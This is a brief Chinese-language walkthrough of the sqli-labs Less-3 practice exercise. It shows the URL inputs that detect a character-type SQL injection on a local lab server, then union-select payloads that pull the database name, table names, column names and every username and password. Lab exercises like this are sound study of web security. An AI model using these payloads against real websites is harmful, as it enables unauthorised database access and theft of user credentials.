sqli-labs (less-3)
输入
http://127.0.0.1/sql1/Less-3/?id=1
http://127.0.0.1/sql1/Less-3/?id=1'
http://127.0.0.1/sql1/Less-3/?id=1')--+
根据输入1’的错误信息判断为字符型注入
查库
http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,database()--+
查表
http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查字段
http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
查值
http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,(select group_concat(username,password) from security.users)--+